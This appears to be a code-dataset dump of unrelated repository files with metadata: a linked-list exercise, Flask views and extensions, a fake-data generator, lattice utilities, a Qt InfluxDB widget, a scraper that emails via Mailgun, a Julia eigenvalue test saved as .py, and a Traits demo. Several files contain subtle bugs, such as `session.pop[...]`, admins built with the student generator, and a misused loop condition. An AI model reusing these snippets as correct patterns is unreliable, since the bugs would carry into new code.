pattern6-in-place-reversal-of-a-linkedlist/4. Reverse alternating K-element Sub-list (medium).py
|
dopiwoo/Grokking-the-Coding-Interview
|
78b2bacf9d761b460ac78882bac42df7465feec9
|
[
"MIT"
] | null | null | null |
pattern6-in-place-reversal-of-a-linkedlist/4. Reverse alternating K-element Sub-list (medium).py
|
dopiwoo/Grokking-the-Coding-Interview
|
78b2bacf9d761b460ac78882bac42df7465feec9
|
[
"MIT"
] | null | null | null |
pattern6-in-place-reversal-of-a-linkedlist/4. Reverse alternating K-element Sub-list (medium).py
|
dopiwoo/Grokking-the-Coding-Interview
|
78b2bacf9d761b460ac78882bac42df7465feec9
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Feb 3 16:59:33 2021
@author: dopiwoo
Given the head of a LinkedList and a number 'k', reverse every alternating 'k' sized sub-list starting from the head.
If, in the end, you are left with a sub-list with less than 'k' elements, reverse it too.
"""
class Node:
def __init__(self, value: int, next_node: 'Node' = None):
self.value = value
self.next = next_node
def __repr__(self) -> str:
string = ''
temp_node = self
while temp_node is not None:
string += '->' + str(temp_node.value)
temp_node = temp_node.next
return string[2:]
def reverse_alternative_k_elements(head: Node, k: int) -> Node or None:
"""
Time Complexity: O(N)
Space Complexity: O(1)
Parameters
----------
head : Node
Input head of a LinkedList.
k : int
Input number 'k'.
Returns
-------
Node or None
The LinkedList reversed every alternating 'k' sized sub-list starting from the head.
"""
if not head:
return None
cur, prev = head, None
while cur:
i = 0
tail, con = cur, prev
while cur and i < k:
third = cur.next
cur.next = prev
prev = cur
cur = third
i += 1
if con:
con.next = prev
else:
head = prev
tail.next = cur
i = 0
while cur and i < k:
prev = cur
cur = cur.next
i += 1
return head
if __name__ == '__main__':
a = Node(1)
a.next = Node(2)
a.next.next = Node(3)
a.next.next.next = Node(4)
a.next.next.next.next = Node(5)
a.next.next.next.next.next = Node(6)
a.next.next.next.next.next.next = Node(7)
a.next.next.next.next.next.next.next = Node(8)
print(a)
print(reverse_alternative_k_elements(a, 2))
| 24.037037
| 117
| 0.546482
| 359
| 0.184386
| 0
| 0
| 0
| 0
| 0
| 0
| 658
| 0.337956
|
3c6ebf3a0e9fc7f67c121517ca72e84e2133c821
| 833
|
py
|
Python
|
scripts/datasets/dataset.py
|
daniele21/Financial_Sentiment_Analysis
|
3734733f2d1d291c81a6239de121edcce861b463
|
[
"MIT"
] | null | null | null |
scripts/datasets/dataset.py
|
daniele21/Financial_Sentiment_Analysis
|
3734733f2d1d291c81a6239de121edcce861b463
|
[
"MIT"
] | null | null | null |
scripts/datasets/dataset.py
|
daniele21/Financial_Sentiment_Analysis
|
3734733f2d1d291c81a6239de121edcce861b463
|
[
"MIT"
] | 1
|
2021-08-18T01:40:56.000Z
|
2021-08-18T01:40:56.000Z
|
from typing import Text, Dict
import torch
from torch.utils.data import Dataset
class MyDataset:
def __init__(self, filepath: Text):
self.data = self.load_data(filepath)
self.prep_data = None
def load_data(self, filepath):
pass
def get_x(self, data=None):
pass
def get_y(self, data=None):
pass
def training_preprocessing(self):
pass
def test_preprocessing(self, data=None):
pass
def postprocessing(self, prediction, model_name):
pass
class NN_Dataset(Dataset):
def __init__(self, x, y):
self.x = torch.IntTensor(x)
self.y = torch.IntTensor(y)
def __getitem__(self, index):
torch.FloatTensor()
return self.x[index], self.y[index]
def __len__(self):
return len(self.x)
| 16.333333
| 53
| 0.619448
| 740
| 0.888355
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
3c6f84e2e28d5d42137620dfcf9d443aafcc4dc6
| 1,447
|
py
|
Python
|
citadel/ext.py
|
CMGS/citadel
|
8363a598ed4422d6671f06bad7def3ebb848f441
|
[
"MIT"
] | null | null | null |
citadel/ext.py
|
CMGS/citadel
|
8363a598ed4422d6671f06bad7def3ebb848f441
|
[
"MIT"
] | null | null | null |
citadel/ext.py
|
CMGS/citadel
|
8363a598ed4422d6671f06bad7def3ebb848f441
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from authlib.client.apps import github
from authlib.flask.client import OAuth
from etcd import Client
from flask import session
from flask_caching import Cache
from flask_mako import MakoTemplates
from flask_session import Session
from flask_sockets import Sockets
from flask_sqlalchemy import SQLAlchemy
from redis import Redis
from citadel.config import ZONE_CONFIG, REDIS_URL
from citadel.libs.utils import memoize
@memoize
def get_etcd(zone):
cluster = ZONE_CONFIG[zone]['ETCD_CLUSTER']
return Client(cluster, allow_reconnect=True)
db = SQLAlchemy()
mako = MakoTemplates()
sockets = Sockets()
rds = Redis.from_url(REDIS_URL)
def fetch_token(oauth_app_name):
token_session_key = '{}-token'.format(oauth_app_name.lower())
return session.get(token_session_key, {})
def update_token(oauth_app_name, token):
token_session_key = '{}-token'.format(oauth_app_name.lower())
session[token_session_key] = token
# I don't think return token was necessary, but that's what the example
# does in the docs: https://docs.authlib.org/en/latest/client/frameworks.html#cache-database
return token
def delete_token(oauth_app_name):
token_session_key = '{}-token'.format(oauth_app_name.lower())
session.pop[token_session_key]
oauth = OAuth(fetch_token=fetch_token, update_token=update_token)
github.register_to(oauth)
cache = Cache(config={'CACHE_TYPE': 'redis'})
sess = Session()
| 27.301887
| 96
| 0.769178
| 0
| 0
| 0
| 0
| 125
| 0.086386
| 0
| 0
| 249
| 0.17208
|
3c6f8f5f4f2e782fc4abccdc891d3ed15ff06ea9
| 6,625
|
py
|
Python
|
generate_fake_data.py
|
upb-uc4/deployment
|
0c82de72bb7e758c5afaf8866b238ff17cf908ea
|
[
"Apache-2.0"
] | null | null | null |
generate_fake_data.py
|
upb-uc4/deployment
|
0c82de72bb7e758c5afaf8866b238ff17cf908ea
|
[
"Apache-2.0"
] | 2
|
2021-02-13T13:19:45.000Z
|
2021-02-13T14:46:02.000Z
|
generate_fake_data.py
|
upb-uc4/deployment
|
0c82de72bb7e758c5afaf8866b238ff17cf908ea
|
[
"Apache-2.0"
] | null | null | null |
import json
import random
import os
import re
from faker import Faker
################################################################################
# Some settings:
################################################################################
ADMIN_COUNT = 2
STUDENT_COUNT = 40
LECTURER_COUNT = 10
EXAM_REG_COUNT = 6
COURSE_COUNT = 10
ROLES = ["Student", "Admin", "Lecturer"]
FIELDS_OF_STUDY = [
"Computer Science",
"Chemistry",
"Biology",
"Physics",
"Religion",
"Sociology",
]
MODULE_PREFICES = [
"Topics of",
"Introduction to",
"Applied",
"Theorotical",
"Experimental",
]
COURSE_TYPES = ["Lecture", "Project Group", "Seminar"]
COUNTRIES = ["Germany", "United States", "Italy", "France", "United Kingdom", "Belgium", "Netherlands", "Spain", "Austria", "Switzerland", "Poland"]
fake = Faker("en-US")
fake.random.seed(654321)
################################################################################
basepath = os.path.join("defaults", "generated")
lecturer_ids = []
modules_by_field_of_study = {
field: [] for field in FIELDS_OF_STUDY
} # Dict with modules mapped to their field of study (to let generated data appear less random)
def generate_user(role: str):
assert role in ROLES
strip_username = lambda username: re.sub("^[a-zA-Z-.]", "", username)
profile = fake.simple_profile()
while (
len(profile["name"].split(" ")) != 2
and len(strip_username(profile["username"])) not in range(5,17)
): # Some names were like Mr. John Smith...
profile = fake.simple_profile()
username = strip_username(profile["username"])
return {
"governmentId": username + fake.pystr(),
"authUser": {
"username": username,
"password": username, # more convenient than fake.password(),
"role": role,
},
"user": {
"username": username,
"enrollmentIdSecret": "",
"isActive": True,
"role": role,
"address": {
"street": fake.street_name(),
"houseNumber": fake.building_number().lstrip("0"),
"zipCode": fake.postcode(),
"city": fake.city(),
"country": random.choice(COUNTRIES)
},
"firstName": profile["name"].split(" ")[0],
"lastName": profile["name"].split(" ")[1],
"email": profile["mail"],
"birthDate": profile["birthdate"].strftime("%Y-%m-%d"),
"phoneNumber": "+{:012d}".format(fake.pyint(0, int("9"*12))),
},
}
def generate_student():
student = generate_user("Student")
student["user"]["latestImmatriculation"] = ""
student["user"]["matriculationId"] = str(fake.pyint(1000000, 9999999))
return student
def generate_lecturer(all_lecturer_ids: list):
lecturer = generate_user("Lecturer")
lecturer["user"]["freeText"] = fake.paragraph()
lecturer["user"]["researchArea"] = fake.job()
all_lecturer_ids.append(lecturer["user"]["username"])
return lecturer
def generate_admin():
return generate_user("Admin")
def generate_exam_reg(all_modules: list):
field_of_study = random.choice(FIELDS_OF_STUDY)
my_modules = []
count = random.randint(2, 5) # Random number of modules for this exam reg
for _ in range(count):
# Choose existing or generate new module for this exam reg
if random.random() < 0.8 or not my_modules:
new_module = {
"id": "M."
+ str(fake.pyint(0, 9999)).zfill(4)
+ "."
+ str(fake.pyint(0, 99999)).zfill(5),
"name": random.choice(MODULE_PREFICES) + " " + field_of_study,
}
all_modules[field_of_study].append(new_module)
my_modules.append(new_module)
elif (
field_of_study in modules_by_field_of_study
and modules_by_field_of_study[field_of_study]
):
module_cand = random.choice(modules_by_field_of_study[field_of_study])
if module_cand and module_cand not in my_modules:
my_modules.append(module_cand)
return {
"name": random.choice(["Bachelor", "Master"])
+ " "
+ field_of_study
+ " v"
+ str(fake.pyint(1, 8)),
"active": True,
"modules": my_modules,
}
def generate_course():
lecturer = random.choice(lecturer_ids)
flatten = lambda list_to_flatten: [
item for sub_list in list_to_flatten for item in sub_list
]
all_module_ids = set(
map(
lambda module: module.get("id"), flatten(modules_by_field_of_study.values())
)
)
module_ids = random.sample(all_module_ids, random.randint(1, 4))
return {
"courseId": "",
"moduleIds": module_ids,
"courseName": fake.catch_phrase(),
"courseType": random.choice(COURSE_TYPES),
"startDate": "2020-12-08",
"endDate": "2020-12-08",
"ects": random.randint(3, 10),
"lecturerId": lecturer,
"maxParticipants": 10 * random.randint(1, 20),
"currentParticipants": 0,
"courseLanguage": random.choice(["German", "English"]),
"courseDescription": fake.paragraph(2),
}
def write_to_file(data, _dir, filename):
directory = os.path.join(os.path.dirname(__file__), basepath, _dir)
if not os.path.exists(directory):
os.makedirs(directory)
with open(os.path.join(directory, filename), "w+") as f:
f.write(data)
def json_dump_dict(data: dict):
return json.dumps(data, indent=4)
for i in range(ADMIN_COUNT):
write_to_file(
json_dump_dict(generate_student()), "admins", str(i).zfill(2) + ".json"
)
for i in range(STUDENT_COUNT):
write_to_file(
json_dump_dict(generate_student()), "students", str(i).zfill(2) + ".json"
)
for i in range(LECTURER_COUNT):
write_to_file(
json_dump_dict(generate_lecturer(lecturer_ids)),
"lecturers",
str(i).zfill(2) + ".json",
)
for i in range(EXAM_REG_COUNT):
write_to_file(
json_dump_dict(generate_exam_reg(modules_by_field_of_study)),
"examRegs",
str(i).zfill(2) + ".json",
)
for i in range(COURSE_COUNT):
write_to_file(
json_dump_dict(generate_course()), "courses", str(i).zfill(2) + ".json"
)
print("Done! 😎")
print(
"Generated: {} Admins, {} Students, {} Lecturers, {} Exam Regs and {} Courses".format(
ADMIN_COUNT, STUDENT_COUNT, LECTURER_COUNT, EXAM_REG_COUNT, COURSE_COUNT
)
)
| 30.113636
| 148
| 0.579019
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,758
| 0.265238
|
3c70133f7cd579129c6a6ff4af02a403f5a5c1b6
| 2,972
|
py
|
Python
|
CodeMixed-Text-Generator/cm_text_generator/lattice_operations.py
|
mohdsanadzakirizvi/CodeMixed-Text-Generator
|
47740eeff3ecb46f5294711f4fe5d3a03a6e0b54
|
[
"MIT"
] | 16
|
2021-06-03T07:16:15.000Z
|
2022-03-24T13:07:31.000Z
|
CodeMixed-Text-Generator/cm_text_generator/lattice_operations.py
|
mohdsanadzakirizvi/CodeMixed-Text-Generator
|
47740eeff3ecb46f5294711f4fe5d3a03a6e0b54
|
[
"MIT"
] | 6
|
2021-06-30T12:06:33.000Z
|
2022-02-10T04:49:10.000Z
|
CodeMixed-Text-Generator/cm_text_generator/lattice_operations.py
|
mohdsanadzakirizvi/CodeMixed-Text-Generator
|
47740eeff3ecb46f5294711f4fe5d3a03a6e0b54
|
[
"MIT"
] | 4
|
2021-07-04T14:21:56.000Z
|
2021-08-23T19:55:06.000Z
|
###LATTICE OPERATIONS
from .data_structure_definitions import *
def trimTrapStates(doof):
flag = 1
while flag == 1:
flag = 0
statesToDelete = []
dict_items = set([t[0][0] for t in doof.transitions.items()])
for i, state in enumerate(doof.states):
if state not in dict_items:
# if len([0 for (k, v) in dict_items if k[0] == state]) == 0:
if state != doof.engEnd and state != doof.mixEnd and state != doof.hinEnd and state not in doof.finalStates:
statesToDelete.append(state)
flag = 1
for state in statesToDelete:
doof.deleteState(state)
def mergeEquivalentStates(doof):
flag = 1
while flag == 1:
flag = 0
toMerge = []
for state1 in doof.states:
for state2 in doof.states:
if state1 != state2:
transitions1 = [(k[1], v) for k,v in doof.transitions.items() if k[0] == state1]
transitions2 = [(k[1], v) for k,v in doof.transitions.items() if k[0] == state2]
if transitions1!=[] and transitions2!=[] and transitions1 == transitions2:
toMerge.append((state1, state2))
flag = 1
for pair in toMerge:
if pair[0] in doof.states and pair[1] in doof.states:
# print 'deleting these:'
# print pair[0], pair[1]
doof.mergeStates(pair[0], [pair[1]])
def removeUselessStates(doof):
statesToRemove = []
for state in doof.states:
transIn = {k: v for k, v in doof.transitions.items() if v == state}
transOut = {k: v for k, v in doof.transitions.items() if k[0] == state}
if state != 0 and len(transIn) == 0:
statesToRemove.append(state)
if len(transIn) == 1 and len(transOut) == 1:
keys_in = list(transIn.keys())
keys_out = list(transOut.keys())
values_out = list(transOut.values())
doof.addTransition(keys_in[0][0], keys_in[0][1][:-2]+" "+keys_out[0][1], values_out[0])
del doof.transitions[keys_in[0]]
del doof.transitions[keys_out[0]]
statesToRemove.append(state)
for state in statesToRemove:
doof.deleteState(state)
def removeDollarTransitions(doof):
dollarTransitions = {k:v for k,v in doof.transitions.items() if k[1] == "$_h" or k[1] == "$_e"}
for k,v in dollarTransitions.items():
transitionsToSink = {kk:vv for kk,vv in doof.transitions.items() if vv == v}
if len(transitionsToSink) == 1:
del doof.transitions[k]
doof.mergeStates(k[0], [v])
else:
print("null transition between" + str(k[0]) + "and" + str(v) + "could not be removed")
def removeUnreachableStates(doof):
flag = 1
while flag == 1:
flag = 0
statesToDelete = []
for state in doof.states:
if len({k: v for k, v in doof.transitions.items() if v == state}) == 0:
if state != doof.initialStates[0]:
statesToDelete.append(state)
flag = 1
for state in statesToDelete:
doof.deleteState(state)
| 33.393258
| 116
| 0.605316
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 196
| 0.065949
|
3c71ada98a6d21e9df0e6b1ca11604cd29f59b82
| 2,949
|
py
|
Python
|
vnpy/app/influx_recorder/ui/widget.py
|
hadrianl/vnpy
|
f197df974eb6d3a0fddb81b591dd98d3d102a4a2
|
[
"MIT"
] | 5
|
2019-05-24T05:19:55.000Z
|
2020-07-29T13:21:49.000Z
|
vnpy/app/influx_recorder/ui/widget.py
|
hadrianl/vnpy
|
f197df974eb6d3a0fddb81b591dd98d3d102a4a2
|
[
"MIT"
] | null | null | null |
vnpy/app/influx_recorder/ui/widget.py
|
hadrianl/vnpy
|
f197df974eb6d3a0fddb81b591dd98d3d102a4a2
|
[
"MIT"
] | 2
|
2019-07-01T02:14:04.000Z
|
2020-07-29T13:21:53.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2020/10/28 0028 11:34
# @Author : Hadrianl
# @File : widget
from vnpy.event import EventEngine, Event
from vnpy.trader.engine import MainEngine
from vnpy.trader.ui import QtWidgets, QtCore
from ..engine import APP_NAME
class InfluxRecorder(QtWidgets.QWidget):
""""""
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super().__init__()
self.main_engine = main_engine
self.event_engine = event_engine
self.influx_record_engine = main_engine.get_engine(APP_NAME)
self.init_ui()
def init_ui(self):
""""""
self.setWindowTitle("InfluxRecorder")
self.setFixedWidth(900)
self.setFixedHeight(500)
self.start_button = QtWidgets.QPushButton("启动")
self.start_button.clicked.connect(self.start_recorder)
self.stop_button = QtWidgets.QPushButton("停止")
self.stop_button.clicked.connect(self.stop_recorder)
self.stop_button.setEnabled(False)
for button in [self.start_button, self.stop_button]:
hint = button.sizeHint()
button.setFixedHeight(hint.height() * 2)
button.setFixedWidth(hint.width() * 4)
self.host_line = QtWidgets.QLineEdit(self.influx_record_engine.host)
self.host_line.setFixedWidth(300)
self.port_line = QtWidgets.QLineEdit(str(self.influx_record_engine.port))
self.port_line.setFixedWidth(300)
self.user_line = QtWidgets.QLineEdit(self.influx_record_engine.user)
self.user_line.setFixedWidth(300)
self.password_line = QtWidgets.QLineEdit(self.influx_record_engine.password)
self.password_line.setFixedWidth(300)
self.password_line.setEchoMode(QtWidgets.QLineEdit.Password)
form = QtWidgets.QFormLayout()
form.addRow("influxdb主机", self.host_line)
form.addRow("influxdb端口", self.port_line)
form.addRow("influxdb用户名", self.user_line)
form.addRow("influxdb密码", self.password_line)
hbox = QtWidgets.QHBoxLayout()
hbox.addLayout(form)
hbox.addWidget(self.start_button)
hbox.addWidget(self.stop_button)
hbox.addStretch()
vbox = QtWidgets.QVBoxLayout()
vbox.addLayout(hbox)
# vbox.addWidget(self.log_monitor)
self.setLayout(vbox)
def start_recorder(self):
""""""
host = self.host_line.text()
port = int(self.port_line.text())
user = self.user_line.text()
password = self.password_line.text()
self.influx_record_engine.start_recorder(host, port, user, password)
self.start_button.setEnabled(False)
self.stop_button.setEnabled(True)
def stop_recorder(self):
""""""
self.influx_record_engine.stop_recorder()
self.start_button.setEnabled(True)
self.stop_button.setEnabled(False)
| 31.709677
| 84
| 0.665649
| 2,687
| 0.903193
| 0
| 0
| 0
| 0
| 0
| 0
| 282
| 0.09479
|
3c749728947c088616bb2bf3b46fdb1485731043
| 5,021
|
py
|
Python
|
application/views/client/users/views.py
|
Zinston/giftr
|
997d4b8127b34cc0009621d66f69bc00ed3b985a
|
[
"Apache-2.0"
] | null | null | null |
application/views/client/users/views.py
|
Zinston/giftr
|
997d4b8127b34cc0009621d66f69bc00ed3b985a
|
[
"Apache-2.0"
] | null | null | null |
application/views/client/users/views.py
|
Zinston/giftr
|
997d4b8127b34cc0009621d66f69bc00ed3b985a
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
"""Define routes for CRUD operations on users."""
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from application.models import (Base,
Gift,
Claim,
User)
from flask import (request,
redirect,
url_for,
render_template,
flash,
session,
Blueprint)
# For making decorators
from functools import wraps
# Bind database
engine = create_engine('sqlite:///giftr.db')
Base.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
c = DBSession()
users_blueprint = Blueprint('users', __name__, template_folder='templates')
# DECORATORS
def login_required(f):
"""Redirect to login page if the user is not logged in (decorator)."""
@wraps(f)
def decorated_function(*args, **kwargs):
if 'username' not in session:
flash('You need to be logged in to see that page.')
return redirect(url_for('login.show'))
return f(*args, **kwargs)
return decorated_function
def include_user(f):
"""Take a u_id kwarg and return a user object (decorator)."""
@wraps(f)
def decorated_function(*args, **kwargs):
u_id = kwargs['u_id']
user = c.query(User).filter_by(id=u_id).one_or_none()
if not user:
flash('There\'s no user here.')
return redirect(url_for('gifts.get'))
# pass along the gift object to the next function
kwargs['user'] = user
return f(*args, **kwargs)
return decorated_function
def user_required(f):
"""Take a user id (u_id) and redirect to home if logged in user doesn't match that id (decorator).""" # noqa
@wraps(f)
def decorated_function(*args, **kwargs):
u_id = kwargs['u_id']
if u_id != session.get('user_id'):
flash('You can only do this for your own profile.')
return redirect(url_for('gifts.get'))
return f(*args, **kwargs)
return decorated_function
# ROUTES
@users_blueprint.route('/users/<int:u_id>/profile', methods=['GET'])
@login_required
@include_user
def get_byid(u_id, user):
"""Render a user with id u_id's profile.
Argument:
u_id (int): the id of the desired user.
user (object): generally passed through the @include_user decorator,
contains a user object of id u_id.
"""
return render_template('user.html',
user=user)
@users_blueprint.route('/users/<int:u_id>/edit', methods=['GET'])
@login_required
def edit_get(u_id):
"""Render an edit form for the logged in user.
Login required.
Argument:
u_id (int): the id of the desired user.
"""
return render_template('edit_user.html')
@users_blueprint.route('/users/<int:u_id>/edit', methods=['POST'])
@login_required
@user_required
@include_user
def edit_post(u_id, user):
"""Edit a user of id u_id with POST.
Login required.
One has to be logged in as the requested user to access this.
Arguments:
u_id (int): the id of the desired user.
user (object): generally passed through the @include_user decorator,
contains a user object of id u_id.
"""
user.name = request.form.get('name')
user.picture = request.form.get('picture')
user.email = request.form.get('email')
user.address = request.form.get('address')
c.add(user)
c.commit()
session['username'] = user.name
session['picture'] = user.picture
session['email'] = user.email
session['address'] = user.address
flash("Your account was successfully edited.")
return redirect(url_for('users.get_byid',
u_id=user.id))
@users_blueprint.route('/users/<int:u_id>/delete', methods=['GET'])
@login_required
def delete_get(u_id):
"""Render a delete form for the logged in user.
Login required.
Arguments:
u_id (int): the id of the desired user.
"""
return render_template('delete_user.html')
@users_blueprint.route('/users/<int:u_id>/delete', methods=['POST'])
@login_required
@include_user
@user_required
def delete_post(u_id, user):
"""Delete a user of id u_id with POST.
Login required.
One has to be the creator of the gift to access this.
Argument:
u_id (int): the id of the desired user.
user (object): generally passed through the @include_user decorator,
contains a user object of id u_id.
"""
# Delete the gifts of that user too
user_gifts = c.query(Gift).filter_by(creator_id=user.id).all()
for gift in user_gifts:
# Delete the claims to that gift first
claims = c.query(Claim).filter_by(gift_id=gift.id).all()
for claim in claims:
c.delete(claim)
c.delete(gift)
c.delete(user)
c.commit()
flash("Your account was successfully deleted.")
return redirect(url_for('logout.disconnect'))
| 28.050279
| 113
| 0.632344
| 0
| 0
| 0
| 0
| 3,803
| 0.757419
| 0
| 0
| 2,221
| 0.442342
|
3c7515d17c45501d0f2599188199dfb75f86e5a6
| 2,077
|
py
|
Python
|
server.py
|
mleger45/embevent
|
c717adb6d172b83ae12cb82021df856831a4e4fb
|
[
"MIT"
] | null | null | null |
server.py
|
mleger45/embevent
|
c717adb6d172b83ae12cb82021df856831a4e4fb
|
[
"MIT"
] | null | null | null |
server.py
|
mleger45/embevent
|
c717adb6d172b83ae12cb82021df856831a4e4fb
|
[
"MIT"
] | null | null | null |
from flask import Flask
import requests
from bs4 import BeautifulSoup
import os
import sqlite3
import logging
logging.basicConfig(filename='example.log', level=logging.DEBUG)
URL = os.environ['SOURCE_URL']
AGENT = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'
app = Flask(__name__)
def send_simple_message(title, message):
return requests.post(
os.environ['MAIL_URL'],
auth=("api", os.environ['MAILGUN_API_KEY']),
data={"from": "Embevent App <mailgun@sandboxfb0448ff1cfb4ffba160daeecce04274.mailgun.org>",
"to": os.environ['MAIL_LIST'].split(";"),
"subject": title,
"text": message})
def processUpdates(cards):
connection = sqlite3.connect("database.db")
cursor = connection.execute("Select * from CARDS")
old_cards = len(cursor.fetchall())
if len(cards) > old_cards:
logging.info("New updates. Processing")
card = cards[0]
title = card.find_all('h2', class_='h3')[0].text
date = card.find_all('h3', class_='h5')[0].text
content = card.find_all(["p", "div"])[0]
command2 = "INSERT INTO CARDS (title, date, content) VALUES ('{0}', '{1}', '{2}')".format(title,date,content)
connection.execute(command2)
connection.commit()
connection.close()
logging.info("Update stored in DB")
send_simple_message(title=title, message=card)
logging.info("Mail sent")
return card.text
else:
logging.info("No updates generated")
f = cards[0]
the_date, = f.find_all('h3', class_='h5')
return "No news. Last update: {0}. articles available: {1}".format(the_date.text, old_cards)
@app.route('/')
def news():
if not URL:
return "No URL added"
response = requests.get(URL, headers={'User-Agent': AGENT })
soup = BeautifulSoup(response.content, 'html.parser')
cards = soup.find_all('div', class_='card')
return processUpdates(cards)
| 32.968254
| 131
| 0.632162
| 0
| 0
| 0
| 0
| 277
| 0.133365
| 0
| 0
| 617
| 0.297063
|
3c761056de60be7b447d3aeb8075e25a0bb554cd
| 1,278
|
py
|
Python
|
nodaysoff/__init__.py
|
attila5287/no_days_off
|
2482b90b841032976002a3888aa546bb7070a46c
|
[
"MIT"
] | 1
|
2019-12-28T05:25:01.000Z
|
2019-12-28T05:25:01.000Z
|
nodaysoff/__init__.py
|
attila5287/no_days_off
|
2482b90b841032976002a3888aa546bb7070a46c
|
[
"MIT"
] | 6
|
2019-12-28T01:12:25.000Z
|
2022-03-12T00:10:08.000Z
|
nodaysoff/__init__.py
|
attila5287/no_days_off
|
2482b90b841032976002a3888aa546bb7070a46c
|
[
"MIT"
] | null | null | null |
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask_bcrypt import Bcrypt
from flask_login import LoginManager
from flask_mail import Mail
from nodaysoff.config import Config
# from flask_session import Session
db = SQLAlchemy()
bcrypt = Bcrypt()
login_manager = LoginManager()
login_manager.login_view = 'users.login'
login_manager.login_message_category = 'primary'
mail = Mail()
def create_app(config_class=Config):
pass
app = Flask(__name__, instance_relative_config=False)
app.config.from_object(Config)
# print('secret'+str(app.secret_key))
db.init_app(app)
bcrypt.init_app(app)
login_manager.init_app(app)
mail.init_app(app)
# sess = Session()
# sess.init_app(app)
from nodaysoff.users.routes import users
from nodaysoff.posts.routes import posts
from nodaysoff.tasks.routes import tasks
from nodaysoff.prodays.routes import prodays
from nodaysoff.main.routes import main
from nodaysoff.errors.handlers import errors
app.register_blueprint(users)
app.register_blueprint(posts)
app.register_blueprint(tasks)
app.register_blueprint(prodays)
app.register_blueprint(main)
app.register_blueprint(errors)
return app
| 30.428571
| 59
| 0.739437
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 136
| 0.106416
|
3c768b97cd3aef1e83be11569f9ef43e98211953
| 695
|
py
|
Python
|
examples/lobpcg_test.py
|
Forgotten/modelscf
|
2cf0fe5210fadcee7da70d6bf035336c38d150db
|
[
"BSD-3-Clause-LBNL"
] | 1
|
2021-09-22T21:48:02.000Z
|
2021-09-22T21:48:02.000Z
|
examples/lobpcg_test.py
|
Forgotten/modelscf
|
2cf0fe5210fadcee7da70d6bf035336c38d150db
|
[
"BSD-3-Clause-LBNL"
] | 2
|
2018-01-19T18:46:35.000Z
|
2019-04-09T22:59:46.000Z
|
examples/lobpcg_test.py
|
Forgotten/modelscf
|
2cf0fe5210fadcee7da70d6bf035336c38d150db
|
[
"BSD-3-Clause-LBNL"
] | 6
|
2018-01-19T18:34:12.000Z
|
2018-04-06T04:13:03.000Z
|
# scrip to test the lobpcg_sep eigenvalue solver
include("../src/lobpcg_sep.jl")
using LinearAlgebra
Ns = 100
k = 5 # number of eigenvectors
A = sqrt(Ns)*Diagonal(ones(Ns)) + rand(Ns, Ns)
A = 0.5*(A + A')
(e, X) = eigen(A)
# orthonormal starting guess of the eigenvectors
X0 = qr(rand(Ns, k + 6)).Q[:, 1:k+6]
#computing the lowest K eigenvalues
(eL, XL, it) = lobpcg_sep(A,X0, x-> x, k )
# printing the error
println("error on the computation the eigenvalues " * string(norm(eL - e[1:k])))
# now we use a preconditioner (the exact inverse)
Ainv = inv(A)
(eL1, XL1, it1) = lobpcg_sep(A,X0, x-> Ainv*x, k)
println("error on the computation the eigenvalues " * string(norm(eL1 - e[1:k])))
| 24.821429
| 81
| 0.667626
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 332
| 0.477698
|
3c7727ecdb99959039e2a39114163de2e8432514
| 1,549
|
py
|
Python
|
TraitsUI/examples/ButtonEditor_demo.py
|
marshallmcdonnell/interactive_plotting
|
35e9a781fa1a7328679794d27e24e194e35c012b
|
[
"MIT"
] | null | null | null |
TraitsUI/examples/ButtonEditor_demo.py
|
marshallmcdonnell/interactive_plotting
|
35e9a781fa1a7328679794d27e24e194e35c012b
|
[
"MIT"
] | null | null | null |
TraitsUI/examples/ButtonEditor_demo.py
|
marshallmcdonnell/interactive_plotting
|
35e9a781fa1a7328679794d27e24e194e35c012b
|
[
"MIT"
] | null | null | null |
"""
Implementation of a ButtonEditor demo plugin for Traits UI demo program.
This demo shows each of the two styles of the ButtonEditor.
(As of this writing, they are identical.)
"""
from traits.api import HasTraits, Button
from traitsui.api import Item, View, Group
from traitsui.message import message
#-------------------------------------------------------------------------
# Demo Class
#-------------------------------------------------------------------------
class ButtonEditorDemo(HasTraits):
""" This class specifies the details of the ButtonEditor demo.
"""
# To demonstrate any given Trait editor, an appropriate Trait is required.
fire_event = Button('Click Me')
def _fire_event_fired():
message("Button clicked!")
# ButtonEditor display
# (Note that Text and ReadOnly versions are not applicable)
event_group = Group(Item('fire_event', style='simple', label='Simple'),
Item('_'),
Item('fire_event', style='custom', label='Custom'),
Item('_'),
Item(label='[text style unavailable]'),
Item('_'),
Item(label='[read only style unavailable]'))
# Demo view
view1 = View(event_group,
title='ButtonEditor',
buttons=['OK'],
width=250)
# Create the demo:
popup = ButtonEditorDemo()
# Run the demo (if invoked from the command line):
if __name__ == '__main__':
popup.configure_traits()
| 30.98
| 78
| 0.551323
| 919
| 0.593286
| 0
| 0
| 0
| 0
| 0
| 0
| 825
| 0.532602
|
3c77652672bdfce35cef51c965f7b9c88501f504
| 1,181
|
py
|
Python
|
setup.py
|
FelixSchwarz/trac-dev-platform
|
d9ede1eb2c883466968a048eaede95ff868a4fda
|
[
"MIT"
] | null | null | null |
setup.py
|
FelixSchwarz/trac-dev-platform
|
d9ede1eb2c883466968a048eaede95ff868a4fda
|
[
"MIT"
] | null | null | null |
setup.py
|
FelixSchwarz/trac-dev-platform
|
d9ede1eb2c883466968a048eaede95ff868a4fda
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
import setuptools
version='0.1'
setuptools.setup(
name='TracDevPlatformPlugin',
version=version,
description='Provide helpers to ease development on top of Trac',
author='Felix Schwarz',
author_email='felix.schwarz@oss.schwarz.eu',
url='http://www.schwarz.eu/opensource/projects/trac_dev_platform',
